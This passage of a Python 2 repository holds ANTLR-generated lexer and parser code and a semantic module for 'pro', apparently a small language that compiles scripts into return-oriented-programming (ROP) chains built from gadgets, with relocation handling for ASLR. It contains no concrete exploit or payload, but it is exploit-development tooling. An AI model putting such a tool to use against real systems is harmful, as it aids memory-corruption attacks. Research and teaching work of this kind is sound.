buf.write(u"\b\3\t\3\t\3\t\3\t\3\t\3\n\3\n\3\13\3\13\3\f\3\f\3\r") 20 | buf.write(u"\3\r\3\16\3\16\3\17\3\17\3\20\3\20\3\21\3\21\3\22\3\22") 21 | buf.write(u"\3\23\3\23\3\24\3\24\3\25\3\25\3\26\3\26\3\27\3\27\3") 22 | buf.write(u"\30\3\30\3\30\7\30\u0088\n\30\f\30\16\30\u008b\13\30") 23 | buf.write(u"\3\31\3\31\5\31\u008f\n\31\3\32\5\32\u0092\n\32\3\32") 24 | buf.write(u"\6\32\u0095\n\32\r\32\16\32\u0096\3\33\5\33\u009a\n\33") 25 | buf.write(u"\3\33\3\33\3\33\6\33\u009f\n\33\r\33\16\33\u00a0\3\34") 26 | buf.write(u"\3\34\5\34\u00a5\n\34\3\34\3\34\3\35\6\35\u00aa\n\35") 27 | buf.write(u"\r\35\16\35\u00ab\3\36\3\36\5\36\u00b0\n\36\3\37\3\37") 28 | buf.write(u"\3 \3 \3!\3!\3\"\3\"\3\"\3\"\3\"\3\"\6\"\u00be\n\"\r") 29 | buf.write(u"\"\16\"\u00bf\5\"\u00c2\n\"\3#\6#\u00c5\n#\r#\16#\u00c6") 30 | buf.write(u"\3#\3#\3$\3$\3$\5$\u00ce\n$\3$\7$\u00d1\n$\f$\16$\u00d4") 31 | buf.write(u"\13$\3$\3$\3%\3%\3%\3%\7%\u00dc\n%\f%\16%\u00df\13%\3") 32 | buf.write(u"%\3%\3%\3%\3%\3\u00dd\2&\3\3\5\4\7\5\t\6\13\7\r\b\17") 33 | buf.write(u"\t\21\n\23\13\25\f\27\r\31\16\33\17\35\20\37\21!\22#") 34 | buf.write(u"\23%\24\'\25)\26+\27-\30/\31\61\32\63\33\65\34\67\35") 35 | buf.write(u"9\2;\2=\2?\2A\2C\2E\36G\37I \3\2\n\4\2ZZzz\4\2$$^^\5") 36 | buf.write(u"\2C\\aac|\3\2\62;\5\2\62;CHch\5\2$$^^pp\4\2\13\13\"\"") 37 | buf.write(u"\4\2\f\f\17\17\u00ee\2\3\3\2\2\2\2\5\3\2\2\2\2\7\3\2") 38 | buf.write(u"\2\2\2\t\3\2\2\2\2\13\3\2\2\2\2\r\3\2\2\2\2\17\3\2\2") 39 | buf.write(u"\2\2\21\3\2\2\2\2\23\3\2\2\2\2\25\3\2\2\2\2\27\3\2\2") 40 | buf.write(u"\2\2\31\3\2\2\2\2\33\3\2\2\2\2\35\3\2\2\2\2\37\3\2\2") 41 | 
buf.write(u"\2\2!\3\2\2\2\2#\3\2\2\2\2%\3\2\2\2\2\'\3\2\2\2\2)\3") 42 | buf.write(u"\2\2\2\2+\3\2\2\2\2-\3\2\2\2\2/\3\2\2\2\2\61\3\2\2\2") 43 | buf.write(u"\2\63\3\2\2\2\2\65\3\2\2\2\2\67\3\2\2\2\2E\3\2\2\2\2") 44 | buf.write(u"G\3\2\2\2\2I\3\2\2\2\3K\3\2\2\2\5M\3\2\2\2\7O\3\2\2\2") 45 | buf.write(u"\tQ\3\2\2\2\13S\3\2\2\2\rW\3\2\2\2\17]\3\2\2\2\21c\3") 46 | buf.write(u"\2\2\2\23h\3\2\2\2\25j\3\2\2\2\27l\3\2\2\2\31n\3\2\2") 47 | buf.write(u"\2\33p\3\2\2\2\35r\3\2\2\2\37t\3\2\2\2!v\3\2\2\2#x\3") 48 | buf.write(u"\2\2\2%z\3\2\2\2\'|\3\2\2\2)~\3\2\2\2+\u0080\3\2\2\2") 49 | buf.write(u"-\u0082\3\2\2\2/\u0084\3\2\2\2\61\u008e\3\2\2\2\63\u0091") 50 | buf.write(u"\3\2\2\2\65\u0099\3\2\2\2\67\u00a2\3\2\2\29\u00a9\3\2") 51 | buf.write(u"\2\2;\u00af\3\2\2\2=\u00b1\3\2\2\2?\u00b3\3\2\2\2A\u00b5") 52 | buf.write(u"\3\2\2\2C\u00c1\3\2\2\2E\u00c4\3\2\2\2G\u00cd\3\2\2\2") 53 | buf.write(u"I\u00d7\3\2\2\2KL\7}\2\2L\4\3\2\2\2MN\7\177\2\2N\6\3") 54 | buf.write(u"\2\2\2OP\7=\2\2P\b\3\2\2\2QR\7\f\2\2R\n\3\2\2\2ST\7x") 55 | buf.write(u"\2\2TU\7c\2\2UV\7t\2\2V\f\3\2\2\2WX\7e\2\2XY\7q\2\2Y") 56 | buf.write(u"Z\7p\2\2Z[\7u\2\2[\\\7v\2\2\\\16\3\2\2\2]^\7c\2\2^_\7") 57 | buf.write(u"t\2\2_`\7t\2\2`a\7c\2\2ab\7{\2\2b\20\3\2\2\2cd\7h\2\2") 58 | buf.write(u"de\7w\2\2ef\7p\2\2fg\7e\2\2g\22\3\2\2\2hi\7*\2\2i\24") 59 | buf.write(u"\3\2\2\2jk\7+\2\2k\26\3\2\2\2lm\7]\2\2m\30\3\2\2\2no") 60 | buf.write(u"\7_\2\2o\32\3\2\2\2pq\7>\2\2q\34\3\2\2\2rs\7.\2\2s\36") 61 | buf.write(u"\3\2\2\2tu\7@\2\2u \3\2\2\2vw\7-\2\2w\"\3\2\2\2xy\7/") 62 | buf.write(u"\2\2y$\3\2\2\2z{\7,\2\2{&\3\2\2\2|}\7\61\2\2}(\3\2\2") 63 | buf.write(u"\2~\177\7`\2\2\177*\3\2\2\2\u0080\u0081\7~\2\2\u0081") 64 | buf.write(u",\3\2\2\2\u0082\u0083\7(\2\2\u0083.\3\2\2\2\u0084\u0089") 65 | buf.write(u"\5=\37\2\u0085\u0088\5=\37\2\u0086\u0088\5? \2\u0087") 66 | buf.write(u"\u0085\3\2\2\2\u0087\u0086\3\2\2\2\u0088\u008b\3\2\2") 67 | buf.write(u"\2\u0089\u0087\3\2\2\2\u0089\u008a\3\2\2\2\u008a\60\3") 68 | buf.write(u"\2\2\2\u008b\u0089\3\2\2\2\u008c\u008f\5\63\32\2\u008d") 69 | buf.write(u"\u008f\5\65\33\2\u008e\u008c\3\2\2\2\u008e\u008d\3\2") 70 | buf.write(u"\2\2\u008f\62\3\2\2\2\u0090\u0092\7/\2\2\u0091\u0090") 71 | buf.write(u"\3\2\2\2\u0091\u0092\3\2\2\2\u0092\u0094\3\2\2\2\u0093") 72 | buf.write(u"\u0095\5? 
\2\u0094\u0093\3\2\2\2\u0095\u0096\3\2\2\2") 73 | buf.write(u"\u0096\u0094\3\2\2\2\u0096\u0097\3\2\2\2\u0097\64\3\2") 74 | buf.write(u"\2\2\u0098\u009a\7/\2\2\u0099\u0098\3\2\2\2\u0099\u009a") 75 | buf.write(u"\3\2\2\2\u009a\u009b\3\2\2\2\u009b\u009c\7\62\2\2\u009c") 76 | buf.write(u"\u009e\t\2\2\2\u009d\u009f\5A!\2\u009e\u009d\3\2\2\2") 77 | buf.write(u"\u009f\u00a0\3\2\2\2\u00a0\u009e\3\2\2\2\u00a0\u00a1") 78 | buf.write(u"\3\2\2\2\u00a1\66\3\2\2\2\u00a2\u00a4\7$\2\2\u00a3\u00a5") 79 | buf.write(u"\59\35\2\u00a4\u00a3\3\2\2\2\u00a4\u00a5\3\2\2\2\u00a5") 80 | buf.write(u"\u00a6\3\2\2\2\u00a6\u00a7\7$\2\2\u00a78\3\2\2\2\u00a8") 81 | buf.write(u"\u00aa\5;\36\2\u00a9\u00a8\3\2\2\2\u00aa\u00ab\3\2\2") 82 | buf.write(u"\2\u00ab\u00a9\3\2\2\2\u00ab\u00ac\3\2\2\2\u00ac:\3\2") 83 | buf.write(u"\2\2\u00ad\u00b0\n\3\2\2\u00ae\u00b0\5C\"\2\u00af\u00ad") 84 | buf.write(u"\3\2\2\2\u00af\u00ae\3\2\2\2\u00b0<\3\2\2\2\u00b1\u00b2") 85 | buf.write(u"\t\4\2\2\u00b2>\3\2\2\2\u00b3\u00b4\t\5\2\2\u00b4@\3") 86 | buf.write(u"\2\2\2\u00b5\u00b6\t\6\2\2\u00b6B\3\2\2\2\u00b7\u00b8") 87 | buf.write(u"\7^\2\2\u00b8\u00c2\t\7\2\2\u00b9\u00ba\7^\2\2\u00ba") 88 | buf.write(u"\u00bb\7z\2\2\u00bb\u00bd\3\2\2\2\u00bc\u00be\5A!\2\u00bd") 89 | buf.write(u"\u00bc\3\2\2\2\u00be\u00bf\3\2\2\2\u00bf\u00bd\3\2\2") 90 | buf.write(u"\2\u00bf\u00c0\3\2\2\2\u00c0\u00c2\3\2\2\2\u00c1\u00b7") 91 | buf.write(u"\3\2\2\2\u00c1\u00b9\3\2\2\2\u00c2D\3\2\2\2\u00c3\u00c5") 92 | buf.write(u"\t\b\2\2\u00c4\u00c3\3\2\2\2\u00c5\u00c6\3\2\2\2\u00c6") 93 | buf.write(u"\u00c4\3\2\2\2\u00c6\u00c7\3\2\2\2\u00c7\u00c8\3\2\2") 94 | buf.write(u"\2\u00c8\u00c9\b#\2\2\u00c9F\3\2\2\2\u00ca\u00cb\7\61") 95 | buf.write(u"\2\2\u00cb\u00ce\7\61\2\2\u00cc\u00ce\7%\2\2\u00cd\u00ca") 96 | buf.write(u"\3\2\2\2\u00cd\u00cc\3\2\2\2\u00ce\u00d2\3\2\2\2\u00cf") 97 | buf.write(u"\u00d1\n\t\2\2\u00d0\u00cf\3\2\2\2\u00d1\u00d4\3\2\2") 98 | buf.write(u"\2\u00d2\u00d0\3\2\2\2\u00d2\u00d3\3\2\2\2\u00d3\u00d5") 99 | buf.write(u"\3\2\2\2\u00d4\u00d2\3\2\2\2\u00d5\u00d6\b$\2\2\u00d6") 100 | buf.write(u"H\3\2\2\2\u00d7\u00d8\7\61\2\2\u00d8\u00d9\7,\2\2\u00d9") 101 | buf.write(u"\u00dd\3\2\2\2\u00da\u00dc\13\2\2\2\u00db\u00da\3\2\2") 102 | buf.write(u"\2\u00dc\u00df\3\2\2\2\u00dd\u00de\3\2\2\2\u00dd\u00db") 103 | buf.write(u"\3\2\2\2\u00de\u00e0\3\2\2\2\u00df\u00dd\3\2\2\2\u00e0") 104 | buf.write(u"\u00e1\7,\2\2\u00e1\u00e2\7\61\2\2\u00e2\u00e3\3\2\2") 105 | buf.write(u"\2\u00e3\u00e4\b%\2\2\u00e4J\3\2\2\2\23\2\u0087\u0089") 106 | buf.write(u"\u008e\u0091\u0096\u0099\u00a0\u00a4\u00ab\u00af\u00bf") 107 | buf.write(u"\u00c1\u00c6\u00cd\u00d2\u00dd\3\b\2\2") 108 | return buf.getvalue() 109 | 110 | 111 | class proLexer(Lexer): 112 | 113 | atn = ATNDeserializer().deserialize(serializedATN()) 114 | 115 | decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ] 116 | 117 | 118 | T__0 = 1 119 | T__1 = 2 120 | T__2 = 3 121 | T__3 = 4 122 | T__4 = 5 123 | T__5 = 6 124 | T__6 = 7 125 | T__7 = 8 126 | T__8 = 9 127 | T__9 = 10 128 | T__10 = 11 129 | T__11 = 12 130 | T__12 = 13 131 | T__13 = 14 132 | T__14 = 15 133 | T__15 = 16 134 | T__16 = 17 135 | T__17 = 18 136 | T__18 = 19 137 | T__19 = 20 138 | T__20 = 21 139 | T__21 = 22 140 | Identifier = 23 141 | Constant = 24 142 | Decimal = 25 143 | Hexadecimal = 26 144 | String = 27 145 | Whitespace = 28 146 | LineComment = 29 147 | BlockComment = 30 148 | 149 | modeNames = [ u"DEFAULT_MODE" ] 150 | 151 | literalNames = [ u"", 152 | u"'{'", u"'}'", u"';'", u"'\n'", u"'var'", u"'const'", u"'array'", 153 | u"'func'", u"'('", 
u"')'", u"'['", u"']'", u"'<'", u"','", u"'>'", 154 | u"'+'", u"'-'", u"'*'", u"'/'", u"'^'", u"'|'", u"'&'" ] 155 | 156 | symbolicNames = [ u"", 157 | u"Identifier", u"Constant", u"Decimal", u"Hexadecimal", u"String", 158 | u"Whitespace", u"LineComment", u"BlockComment" ] 159 | 160 | ruleNames = [ u"T__0", u"T__1", u"T__2", u"T__3", u"T__4", u"T__5", 161 | u"T__6", u"T__7", u"T__8", u"T__9", u"T__10", u"T__11", 162 | u"T__12", u"T__13", u"T__14", u"T__15", u"T__16", u"T__17", 163 | u"T__18", u"T__19", u"T__20", u"T__21", u"Identifier", 164 | u"Constant", u"Decimal", u"Hexadecimal", u"String", u"Char_sequence", 165 | u"Char", u"Nondigit", u"Digit", u"Hexdigit", u"Escape_sequence", 166 | u"Whitespace", u"LineComment", u"BlockComment" ] 167 | 168 | grammarFileName = u"pro.g4" 169 | 170 | def __init__(self, input=None): 171 | super(proLexer, self).__init__(input) 172 | self.checkVersion("4.5.2") 173 | self._interp = LexerATNSimulator(self, self.atn, self.decisionsToDFA, PredictionContextCache()) 174 | self._actions = None 175 | self._predicates = None 176 | 177 | 178 | -------------------------------------------------------------------------------- /pro/parse/__init__.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import antlr4 3 | from collections import OrderedDict 4 | from .proLexer import proLexer 5 | from .proParser import proParser 6 | from .proVisitor import proVisitor 7 | from .proErrorListener import proErrorListener 8 | 9 | class SemanticError(Exception): 10 | pass 11 | 12 | class Expression(object): 13 | constant = None 14 | _value = None 15 | 16 | @property 17 | def value(self): 18 | if self._value is not None: 19 | return self._value 20 | self._value = self.eval() 21 | return self._value 22 | 23 | def eval(self, ctx=None): 24 | return self._value 25 | 26 | class BinaryExpression(Expression): 27 | def __init__(self, op, el, er): 28 | if not op in '+-*/^|&': 29 | raise SemanticError('unsupported op %s' % op) 30 | self.op = op 31 | 32 | if el.constant is False or er.constant is False: 33 | raise SemanticError('expression should be constant') 34 | 35 | self.constant = True 36 | self.expr_left = el 37 | self.expr_right = er 38 | 39 | def eval(self, ctx=None): 40 | lv = self.expr_left.eval(ctx) 41 | rv = self.expr_right.eval(ctx) 42 | if isinstance(lv, Address): 43 | # Address arithmetic 44 | if self.op == '+': 45 | return Address(lv.base, lv.offset + rv) 46 | elif self.op == '-': 47 | return Address(lv.base, lv.offset - rv) 48 | return eval('%d %s %d' % (lv, self.op, rv)) 49 | 50 | def __repr__(self): 51 | try: 52 | return '(%r %s %r)' % (self.expr_left, self.op, self.expr_right) 53 | except TypeError: 54 | raise SemanticError('invalid binary operation') 55 | 56 | class UnaryExpression(Expression): 57 | def __init__(self, op, e): 58 | if not op in '&': 59 | raise SemanticError('unsupported op %s' % op) 60 | self.op = op 61 | 62 | if not isinstance(e, (Var, Array)): 63 | raise SemanticError('invalid L-value') 64 | 65 | self.constant = True 66 | self.expr = e 67 | 68 | def eval(self, ctx=None): 69 | return self.expr.addr 70 | 71 | def __repr__(self): 72 | return '%s%r' % (self.op, self.expr) 73 | 74 | class Symbol(Expression): 75 | constant = False 76 | def __init__(self, name): 77 | super(Symbol, self).__init__() 78 | self.name = name 79 | 80 | self._base = '_DATA' 81 | self._offset = None 82 | 83 | @property 84 | def addr(self): 85 | return Address(self._base, self._offset) 86 | 87 | def __str__(self): 88 | return self.name 89 | 
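# The concrete symbol kinds follow.  Array and Var reserve storage in .data
# (the Environment assigns their offsets in declaration order), while Const
# and Func are immediates in the rop chain itself: a Const folds to a
# compile-time value, and a Func resolves to an Address(base, offset) that is
# fixed up against the relocation map when the chain is generated.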
90 | class Array(Symbol): 91 | constant = True 92 | def __init__(self, name, initializer): 93 | super(Array, self).__init__(name) 94 | 95 | if not isinstance(initializer, Expression) or not initializer.constant: 96 | raise SemanticError('invalid array "%s"' % name) 97 | 98 | if isinstance(initializer, String): 99 | self.size = initializer.size 100 | self.data = initializer.value 101 | elif isinstance(initializer, Array): 102 | self.size = initializer.size 103 | self.data = initializer.data 104 | else: 105 | self.size = initializer.value 106 | self.data = '\x00' * self.size 107 | 108 | if len(self.data) > self.size: 109 | raise SemanticError('inconsistent array initializer') 110 | 111 | def eval(self, ctx=None): 112 | return self.addr 113 | 114 | def __repr__(self): 115 | data = self.data if len(self.data) < 0x20 else self.data[:0x20] + '...' 116 | return 'array %s[%d] = %r' % (self.name, self.size, data) 117 | 118 | class Const(Symbol): 119 | constant = True 120 | def __init__(self, name, initializer): 121 | super(Const, self).__init__(name) 122 | if not isinstance(initializer, Expression) or not initializer.constant: 123 | raise SemanticError('invalid const initializer for "%s"' % name) 124 | self.size = 0 125 | self._value = initializer.value 126 | 127 | def __repr__(self): 128 | return '%s = %#x' % (self.name, self.value) 129 | 130 | class Func(Symbol): 131 | constant = True 132 | def __init__(self, name, initializer): 133 | super(Func, self).__init__(name) 134 | self._base = initializer[0] 135 | self._offset = initializer[1] if len(initializer) > 1 else 0 136 | self.parse_signature(initializer[2] if len(initializer) > 2 else None) 137 | self.size = 0 138 | 139 | def eval(self, ctx=None): 140 | return self.addr 141 | 142 | def __repr__(self): 143 | return '%s = %r' % (self.name, self.addr) 144 | 145 | def __getattr__(self, name): 146 | if self.attr is not None and name in self.attr: 147 | return True 148 | return None 149 | 150 | def parse_signature(self, sig=None): 151 | ''' A Func (gadget) signature is Input, Output, Clobber, Attributes. 152 | Input/Output/Clobber are sets of registers; Attributes is a special 153 | hint for the compiler. The fields are separated by ':', and the registers in a set 154 | are separated by ','. If no signature is provided, the Func will 155 | be called with the default calling convention.
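For example, a signature string like 'rdi,rsi::rax:va' (illustrative only) describes a gadget that takes its two arguments in rdi and rsi, exposes no output register, clobbers rax, and accepts a variable number of arguments (the 'va' attribute below).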
156 | 157 | Current Attributes: 158 | va variable arguments 159 | align call stack should be aligned 160 | ''' 161 | if sig is None: 162 | self.input = None 163 | self.output = None 164 | self.clobber = None 165 | self.attr = set() 166 | return 167 | 168 | regsets = [] 169 | 170 | for regset in sig.split(':'): 171 | if regset == '': 172 | regsets.append([]) 173 | else: 174 | regsets.append(regset.split(',')) 175 | 176 | while len(regsets) < 4: 177 | regsets.append([]) 178 | 179 | self.input = regsets[0] 180 | self.output = regsets[1] 181 | self.clobber = regsets[2] 182 | self.attr = set(regsets[3]) 183 | 184 | 185 | class Var(Symbol): 186 | constant = False 187 | def __init__(self, name, initializer): 188 | super(Var, self).__init__(name) 189 | self.size = 8 190 | if isinstance(initializer, Expression): 191 | if not initializer.constant: 192 | raise SemanticError('invalid var "%s"' % name) 193 | self._value = initializer.value 194 | 195 | def __repr__(self): 196 | r = 'var %s' % (self.name) 197 | if self._value: 198 | r += ' %#x' % self._value 199 | return r 200 | 201 | class String(Expression): 202 | constant = True 203 | def __init__(self, value): 204 | self._value = value 205 | self.size = len(value) + 8 - len(value) % 8 206 | 207 | def __repr__(self): 208 | return `self._value` 209 | 210 | class Int(Expression): 211 | constant = True 212 | def __init__(self, value): 213 | if isinstance(value, (int, long)): 214 | self._value = value 215 | elif isinstance(value, (str, unicode)) and '0x' in value.lower(): 216 | self._value = int(value, 16) 217 | else: 218 | self._value = int(value) 219 | 220 | def __repr__(self): 221 | return '%#x' % self._value 222 | 223 | class Address(BinaryExpression): 224 | def __init__(self, base, offset): 225 | super(Address, self).__init__('+', String(base), Int(offset)) 226 | self.base = self.expr_left.value 227 | self.offset = self.expr_right.value 228 | 229 | def eval(self, ctx=None): 230 | if ctx is None: 231 | return (self.base, self.offset) 232 | else: 233 | base = ctx.get(self.base, None) 234 | if base is None: 235 | raise AttributeError('no relocating information for "%s"' % self.base) 236 | return base + self.offset 237 | 238 | def __repr__(self): 239 | return '<%s, %#x>' % (self.base, self.offset) 240 | 241 | class Environment(): 242 | def __init__(self): 243 | self.vars = OrderedDict() 244 | self._offset = 0 245 | 246 | def __setitem__(self, key, value): 247 | if key in self.vars: 248 | raise SemanticError('duplicated variable "%s"' % key) 249 | if value.name is None: 250 | if not isinstance(value, Array): 251 | raise SemanticError('anonymous symbol is not allowed for %r' % type(value)) 252 | value.name = 'off_%x' % (self._offset) 253 | if not isinstance(value, (Const, Func)): 254 | # Const and Func are immediates in rop chain(.code), they do not 255 | # appear in .data 256 | value._offset = self._offset 257 | self._offset += value.size 258 | self.vars[key] = value 259 | 260 | def __getitem__(self, key): 261 | if not key in self.vars: 262 | raise SemanticError('undefined variable "%s"' % key) 263 | return self.vars[key] 264 | 265 | def __contains__(self, key): 266 | return key in self.vars 267 | 268 | @property 269 | def size(self): 270 | return self._offset 271 | 272 | def __repr__(self): 273 | r = '' 274 | for cls in (Const, Func, Var, Array): 275 | r += cls.__name__ + '\n' 276 | r += '\n'.join(map(repr, (v for v in self.vars.itervalues() if isinstance(v, cls)))) 277 | r += '\n\n' 278 | return r 279 | 280 | class Call(object): 281 | ''' a Call is 
`ret/jmp to a gadget with arguments` ''' 282 | def __init__(self, func, args): 283 | self.func = func 284 | self.args = args 285 | if isinstance(func, Func) and func.sig is not None: 286 | # check signature if it's not a function with variable arguments 287 | reg_in = func.sig['input'] 288 | if len(reg_in) != len(args) and func.va is not True: 289 | raise SemanticError('"%s" takes %d parameters, but %d is provided' % (func, len(reg_in), len(args))) 290 | elif isinstance(func, Const) and func.name == 'inline': 291 | for arg in args: 292 | if not arg.constant: 293 | raise SemanticError('"%s" is not a constant in inline statement' % arg) 294 | 295 | def __repr__(self): 296 | return '%s(%s)' % (self.func.name, ', '.join(map(repr, self.args))) 297 | 298 | class Program(proVisitor): 299 | def __init__(self, **kwargs): 300 | super(proVisitor, self).__init__(**kwargs) 301 | 302 | self.name = None 303 | self.env = Environment() 304 | 305 | # builtin variables 306 | self.env['undefined'] = Const('undefined', Int(0)) 307 | self.env['inline'] = Const('inline', Int(1)) 308 | 309 | def visitProgram(self, ctx): 310 | name = ctx.Identifier().getText() 311 | self.name = name 312 | statements = [] 313 | for stmt in ctx.statement(): 314 | if stmt.declaration(): 315 | self.visitDeclaration(stmt.declaration()) 316 | elif stmt.call_statement(): 317 | statements.append(self.visitCall_statement(stmt.call_statement())) 318 | self.statements = statements 319 | 320 | def visitDeclaration(self, ctx): 321 | type = ctx.type_specifier().getText() 322 | name = ctx.Identifier().getText() 323 | 324 | initializer = None 325 | if ctx.initializer(): 326 | initializer = self.visitInitializer(ctx.initializer(), name, type) 327 | 328 | cls = {'var':Var, 'func':Func, 'array':Array, 'const':Const}[type] 329 | self.env[name] = cls(name, initializer) 330 | 331 | def visitInitializer(self, ctx, name, type): 332 | if type == 'func': 333 | if not ctx.func_initializer(): 334 | raise SemanticError('function initializer required for "%s"' % name) 335 | elif type == 'array': 336 | if not ctx.array_initializer(): 337 | raise SemanticError('array initializer required for "%s"' % name) 338 | elif type == 'const' or type == 'var': 339 | if not ctx.expression_initializer(): 340 | raise SemanticError('expression initializer required for "%s"' % name) 341 | return self.visitChildren(ctx) 342 | 343 | def visitExpression_initializer(self, ctx): 344 | return self.visitExpression(ctx.expression()) 345 | 346 | def visitArray_initializer(self, ctx): 347 | return self.visitExpression(ctx.expression()) 348 | 349 | def visitFunc_initializer(self, ctx): 350 | base = ctx.Identifier().getText() 351 | offset = ctx.Constant().getText() if ctx.Constant() else 0 352 | signature = ctx.String().getText()[1:-1].decode('string-escape') if ctx.String() else None 353 | return (base, offset, signature) 354 | 355 | def visitBinary_expression(self, ctx): 356 | el = self.visitPrimary_expression(ctx.getChild(0)) 357 | op = ctx.binary_operator().getText() 358 | er = self.visitPrimary_expression(ctx.getChild(2)) 359 | return BinaryExpression(op, el, er) 360 | 361 | def visitUnary_expression(self, ctx): 362 | op = ctx.unary_operator().getText() 363 | e = self.visitPrimary_expression(ctx.primary_expression()) 364 | return UnaryExpression(op, e) 365 | 366 | def visitPrimary_expression(self, ctx): 367 | if ctx.Identifier(): 368 | var = ctx.Identifier().getText() 369 | return self.env[var] 370 | elif ctx.Constant(): 371 | return Int(ctx.Constant().getText()) 372 | elif 
ctx.String(): 373 | s = ctx.String().getText()[1:-1].decode('string-escape') 374 | _s = '$' + s 375 | if _s not in self.env: 376 | self.env[_s] = Array(None, String(s)) 377 | return self.env[_s] 378 | elif ctx.expression(): 379 | return self.visitExpression(ctx.expression()) 380 | else: 381 | raise SemanticError('unknown primary expression "%s"' % ctx.getText()) 382 | 383 | def visitCall_statement(self, ctx): 384 | func = self.env[ctx.Identifier().getText()] 385 | if not isinstance(func, (Func, Const, Var)): 386 | # Func will be relocated if ASLR is enabled, however Const/Var 387 | # can also be used a function 388 | raise SemanticError('"%s" is not a function' % func) 389 | args = self.visitArguments(ctx.arguments()) 390 | return Call(func, args) 391 | 392 | def visitArguments(self, ctx): 393 | if ctx is None: 394 | return [] 395 | return self.visitArguments(ctx.arguments()) + [self.visitExpression(ctx.expression())] 396 | 397 | def parse(text): 398 | lexer = proLexer(antlr4.InputStream(text)) 399 | lexer.removeErrorListeners() 400 | lexer.addErrorListener(proErrorListener(text)) 401 | stream = antlr4.CommonTokenStream(lexer) 402 | 403 | parser = proParser(stream) 404 | parser.removeErrorListeners() 405 | parser.addErrorListener(proErrorListener(text)) 406 | tree = parser.program() 407 | 408 | prog = Program() 409 | prog.visit(tree) 410 | return prog 411 | 412 | -------------------------------------------------------------------------------- /pro/parse/proParser.py: -------------------------------------------------------------------------------- 1 | # Generated from pro.g4 by ANTLR 4.5.2 2 | # encoding: utf-8 3 | from __future__ import print_function 4 | from antlr4 import * 5 | from io import StringIO 6 | 7 | def serializedATN(): 8 | with StringIO() as buf: 9 | buf.write(u"\3\u0430\ud6d1\u8206\uad2d\u4417\uaef1\u8d80\uaadd\3") 10 | buf.write(u" \u0081\4\2\t\2\4\3\t\3\4\4\t\4\4\5\t\5\4\6\t\6\4\7\t") 11 | buf.write(u"\7\4\b\t\b\4\t\t\t\4\n\t\n\4\13\t\13\4\f\t\f\4\r\t\r") 12 | buf.write(u"\4\16\t\16\4\17\t\17\4\20\t\20\4\21\t\21\4\22\t\22\3") 13 | buf.write(u"\2\3\2\3\2\7\2(\n\2\f\2\16\2+\13\2\3\2\3\2\3\3\3\3\3") 14 | buf.write(u"\3\5\3\62\n\3\3\4\3\4\3\5\3\5\3\5\5\59\n\5\3\6\3\6\3") 15 | buf.write(u"\7\3\7\3\7\5\7@\n\7\3\b\3\b\3\b\3\b\3\t\3\t\3\t\3\t\3") 16 | buf.write(u"\n\3\n\3\n\3\n\3\n\3\n\5\nP\n\n\5\nR\n\n\3\n\3\n\3\13") 17 | buf.write(u"\3\13\3\13\5\13Y\n\13\3\13\3\13\3\f\3\f\3\f\3\f\3\f\3") 18 | buf.write(u"\f\7\fc\n\f\f\f\16\ff\13\f\3\r\3\r\3\r\5\rk\n\r\3\16") 19 | buf.write(u"\3\16\3\16\3\16\3\17\3\17\3\17\3\20\3\20\3\21\3\21\3") 20 | buf.write(u"\22\3\22\3\22\3\22\3\22\3\22\3\22\5\22\177\n\22\3\22") 21 | buf.write(u"\2\3\26\23\2\4\6\b\n\f\16\20\22\24\26\30\32\34\36 \"") 22 | buf.write(u"\2\5\3\2\5\6\3\2\7\n\3\2\22\30~\2$\3\2\2\2\4\61\3\2\2") 23 | buf.write(u"\2\6\63\3\2\2\2\b\65\3\2\2\2\n:\3\2\2\2\f?\3\2\2\2\16") 24 | buf.write(u"A\3\2\2\2\20E\3\2\2\2\22I\3\2\2\2\24U\3\2\2\2\26\\\3") 25 | buf.write(u"\2\2\2\30j\3\2\2\2\32l\3\2\2\2\34p\3\2\2\2\36s\3\2\2") 26 | buf.write(u"\2 u\3\2\2\2\"~\3\2\2\2$%\7\31\2\2%)\7\3\2\2&(\5\4\3") 27 | buf.write(u"\2\'&\3\2\2\2(+\3\2\2\2)\'\3\2\2\2)*\3\2\2\2*,\3\2\2") 28 | buf.write(u"\2+)\3\2\2\2,-\7\4\2\2-\3\3\2\2\2.\62\5\24\13\2/\62\5") 29 | buf.write(u"\b\5\2\60\62\5\6\4\2\61.\3\2\2\2\61/\3\2\2\2\61\60\3") 30 | buf.write(u"\2\2\2\62\5\3\2\2\2\63\64\t\2\2\2\64\7\3\2\2\2\65\66") 31 | buf.write(u"\5\n\6\2\668\7\31\2\2\679\5\f\7\28\67\3\2\2\289\3\2\2") 32 | buf.write(u"\29\t\3\2\2\2:;\t\3\2\2;\13\3\2\2\2<@\5\16\b\2=@\5\20") 33 | 
buf.write(u"\t\2>@\5\22\n\2?<\3\2\2\2?=\3\2\2\2?>\3\2\2\2@\r\3\2") 34 | buf.write(u"\2\2AB\7\13\2\2BC\5\30\r\2CD\7\f\2\2D\17\3\2\2\2EF\7") 35 | buf.write(u"\r\2\2FG\5\30\r\2GH\7\16\2\2H\21\3\2\2\2IJ\7\17\2\2J") 36 | buf.write(u"Q\7\31\2\2KL\7\20\2\2LO\7\32\2\2MN\7\20\2\2NP\7\35\2") 37 | buf.write(u"\2OM\3\2\2\2OP\3\2\2\2PR\3\2\2\2QK\3\2\2\2QR\3\2\2\2") 38 | buf.write(u"RS\3\2\2\2ST\7\21\2\2T\23\3\2\2\2UV\7\31\2\2VX\7\13\2") 39 | buf.write(u"\2WY\5\26\f\2XW\3\2\2\2XY\3\2\2\2YZ\3\2\2\2Z[\7\f\2\2") 40 | buf.write(u"[\25\3\2\2\2\\]\b\f\1\2]^\5\30\r\2^d\3\2\2\2_`\f\3\2") 41 | buf.write(u"\2`a\7\20\2\2ac\5\30\r\2b_\3\2\2\2cf\3\2\2\2db\3\2\2") 42 | buf.write(u"\2de\3\2\2\2e\27\3\2\2\2fd\3\2\2\2gk\5\"\22\2hk\5\32") 43 | buf.write(u"\16\2ik\5\34\17\2jg\3\2\2\2jh\3\2\2\2ji\3\2\2\2k\31\3") 44 | buf.write(u"\2\2\2lm\5\"\22\2mn\5\36\20\2no\5\"\22\2o\33\3\2\2\2") 45 | buf.write(u"pq\5 \21\2qr\5\"\22\2r\35\3\2\2\2st\t\4\2\2t\37\3\2\2") 46 | buf.write(u"\2uv\7\30\2\2v!\3\2\2\2w\177\7\31\2\2x\177\7\32\2\2y") 47 | buf.write(u"\177\7\35\2\2z{\7\13\2\2{|\5\30\r\2|}\7\f\2\2}\177\3") 48 | buf.write(u"\2\2\2~w\3\2\2\2~x\3\2\2\2~y\3\2\2\2~z\3\2\2\2\177#\3") 49 | 